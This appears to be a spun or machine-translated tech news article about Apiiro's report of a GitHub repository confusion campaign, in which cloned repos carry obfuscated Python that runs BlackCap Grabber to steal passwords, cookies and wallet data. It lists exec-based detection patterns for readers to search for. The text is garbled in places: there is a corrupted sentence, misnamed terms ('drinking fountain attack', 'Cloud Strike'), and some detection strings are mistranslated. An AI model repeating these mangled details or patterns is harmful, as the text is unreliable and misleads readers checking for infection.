What you need to know
- Cybersecurity firm Apiiro has reported that GitHub has suffered a major attack that could potentially affect thousands of people.
- This attack involves cloning a safe, clean repository, adding malicious obfuscated code, and re-uploading it.
- GitHub is trying to remove malicious repositories, but it seems like they can’t track them all.
In a recent report by Apiiror, our security research and data science teams uncovered a very large-scale attack. Apiiro calls this a malicious repository disruption campaign. The Apiiro team estimates that over 100,000 GitHub repositories are affected, and possibly millions of GitHub repositories. Unfortunately, this isn’t the first time we’ve had to report that GitHub is being used by malicious actors. A few months ago, we discussed how GitHub is being used to facilitate ransomware and create a command and control channel for ransomware attacks.
These attacks are not very complex or difficult to stop. The problem is that attacks are occurring at such an alarming rate that GitHub seems to be struggling to keep up.
What is a repository confusion attack?
A GitHub repository is a place where GitHub users can upload and share code with others around the world. There is a very popular repository that many people search and download frequently. In a watering hole attack, an attacker downloads a popular and good repository and adds malicious code to it.7th layer “” “Eh”Send “ac”ord”ng” to Api”ro and reupload it to GitHub with the same name. They then spread fake versions of the repository to targeted users through social media, Discord, and other means. These features indicate padding. Hole attacks are very common in cybersecurity.
a drinking fountain attack This involves cyber attackers targeting groups of users and infecting websites that they frequently visit. Attackers patiently wait for users to visit these compromised websites and redirect them to malicious sites to infect users’ computers and give them access to the organization’s network.
Once these attackers reupload a malicious repository, they use automation to fork it thousands of times. This tactic is fairly commonly used. I remember a few years ago, there was a trending music album by a famous artist, and many people tried to download it via torrent. However, the files in circulation were malicious and caused many people to lose their data.
How do malicious GitHub repositories infect my PC?
Apiiro and other cybersecurity companies call this a supply chain attack. While that may be technically true, I think GitHub barely qualifies as a supply chain.
Supply chain attacks are cyberattacks that target trusted third-party vendors or suppliers. ”This includes injecting malicious code into software or compromising hardware components to gain unauthorized access to a company’s network or data. ” Around Cloud Strike.
Typically, the supply chain must come from a third-party vendor or supplier with access to the infrastructure, rather than a website hosting the code used in the company’s environment.
These attacks obfuscate the code and primarily use Python to execute the attacks. Once the payload is delivered and the vulnerability is exploited, the code uses BlackCap Grabber to perform actions on the target and send the stolen information to a command and control server. If you download a malicious GitHub repository, these things can be stolen or run on your PC.
- Browser passwords, cookies, and browsing history
- System information
- Login credentials from apps and tools like Steam, MetaMask, Exodus, etc.
- It also attempts to bypass TokenProtector.
- Hijacks the Windows clipboard to change the cryptocurrency address and replace its contents with the attacker’s wallet address (among other features)
What can Microsoft do to make GitHub secure?
According to the report, “Although GitHub has been notified and most of the malicious repositories have been removed, the campaign continues, with increasingly prevalent attacks attempting to inject malicious code into the supply chain. ”
The attack began in May 2023 but escalated rapidly. This attack appears to be a whack-a-mole situation, and GitHub should attempt to detect this code after it has been uploaded, perhaps when it is too late. If these attacks continue, more users may be infected.
If you’re a heavy GitHub user, you probably can’t rely on Microsoft or GitHub to keep you safe. Let’s say you want to check if your PC is infected. Apiiro provided her VirusTotal graph with some of the malicious files detected. If you want to check these files on your PC, it will take a lot of time.
Look for a Python pattern that matches the following code string in your PC environment.
- exec(fernet
- exec(request
- exec(_ _import
- Execute (byte
- exec(“””\nimport
- Run (compile
- _ _import_ _(“built-in”).exec(
A best practice is to run your code in a sandbox to protect your primary PC. Look for code that communicates with social media platforms and crypto wallets. Until Microsoft can address this issue, use caution when downloading code from GitHub.
GitHub isn’t the only cybersecurity issue facing Microsoft.
In an era of pervasive AI integration, there is a perfect time for Microsoft to prioritize internal security measures before expanding externally. Despite advances in AI, it remains clear that human analysts and engineers are essential to the first line of defense against cyber threats. As the cybersecurity landscape evolves, individuals interested in entering this field may find guidance such as the Cybersecurity His Starter Guide valuable.
Microsoft recently launched Security Copilot, a tool that purports to enhance the performance of cybersecurity defenders. But its effectiveness depends heavily on customer engagement, reflecting Microsoft’s hands-off approach, a hallmark of Microsoft’s notoriously minimal investment in customer service. This ethos appears to extend to cybersecurity, where Microsoft’s efforts seem largely reactive, despite regular maintenance and updates like Patch Tuesday.
GitHub, a subsidiary of Microsoft, has been effectively exploited by hackers, raising questions about the company’s ability to leverage AI for defensive purposes. Still, if Microsoft can strengthen its systems, including its OS, servers, and subsidiaries such as GitHub, it could significantly reduce breach incidents worldwide, benefiting all parties.